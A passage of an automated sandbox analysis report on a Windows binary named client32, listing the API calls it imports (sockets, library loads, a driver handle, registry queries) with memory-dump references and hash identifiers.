                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                  • String ID: GetModuleFileNameExA
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(6BEFB898,00000000,?,?,?,6BEBDA7F,?,00000000), ref: 6BEBA503
                                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6BEBA568
                                                                                                                  • Sleep.KERNEL32(00000000,?,6BEBDA7F,?,00000000), ref: 6BEBA581
                                                                                                                  • LeaveCriticalSection.KERNEL32(6BEFB898,00000000), ref: 6BEBA5B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4212191310-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • ioctlsocket.WSOCK32(941034B3,4004667F,00000000,a3k), ref: 6BEB5D1F
                                                                                                                  • select.WSOCK32(00000001,?,00000000,?,00000000,941034B3,4004667F,00000000,a3k), ref: 6BEB5D62
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ioctlsocketselect
                                                                                                                  • String ID: a3k
                                                                                                                  • API String ID: 1457273030-1610497900
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102E966,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 110151F7
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11015208
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                  • String ID: \\.\NSWFPDrv
                                                                                                                  • API String ID: 3498533004-85019792
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 6BEB8FE4
                                                                                                                  • getsockname.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB9005
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,00000010,?,02B03430,?), ref: 6BEB902E
                                                                                                                    • Part of subcall function 6BEB5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3066294524-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • inet_ntoa.WSOCK32(00000080,?,00000000,?,6BEB8F91,00000000,00000000,6BEFB8DA,?,00000080), ref: 6BEB5852
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: inet_ntoa
                                                                                                                  • String ID: gfff
                                                                                                                  • API String ID: 1879540557-1553575800
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,6BEB8DC8), ref: 6BEB4F78
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: psapi.dll
                                                                                                                  • API String ID: 1029625771-80456845
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: nslsp.dll
                                                                                                                  • API String ID: 1029625771-3933918195
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                                    • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                                    • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                                  • std::exception::exception.LIBCMT ref: 1105F2E3
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 1105F2F8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1338273076-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC6C26
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 6BEC6C5B
                                                                                                                    • Part of subcall function 6BEC6940: GetTickCount.KERNEL32 ref: 6BEC6950
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountTick$Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4250438611-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • WSACancelBlockingCall.WSOCK32 ref: 6BEB63A9
                                                                                                                  • Sleep.KERNEL32(00000032), ref: 6BEB63B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockingCallCancelSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3706969569-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(\yMu,?,00000104,754D795C), ref: 11141187
                                                                                                                    • Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688
                                                                                                                  • GetLastError.KERNEL32(?,00000000,754D795C,00000000), ref: 11141275
                                                                                                                  • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,754D795C,00000000), ref: 11141285
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3768737497-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,754D8400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3660427363-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6BED6F16,00000000,?,6BEDD40B,00000001,6BED6F16,00000000,00000000,00000000,?,6BED6F16,00000001,00000214), ref: 6BEDA0C5
                                                                                                                    • Part of subcall function 6BED60F9: __getptd_noexit.LIBCMT ref: 6BED60F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 328603210-0
                                                                                                                  • Opcode ID: caad4b034499e56de0ac907be45151279203dc6b15cf1bba5dcfb2a729a0db43
                                                                                                                  • Instruction ID: 09709db7704eb0dc68934b6edca5eb035cb87476616d20ce7b3c5eeba2484bf0
                                                                                                                  • Opcode Fuzzy Hash: caad4b034499e56de0ac907be45151279203dc6b15cf1bba5dcfb2a729a0db43
                                                                                                                  • Instruction Fuzzy Hash: 9C01F1313812169EEB148E24DC10B573758AF81368F2099A9EA168B2C0DBFDD5128640
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%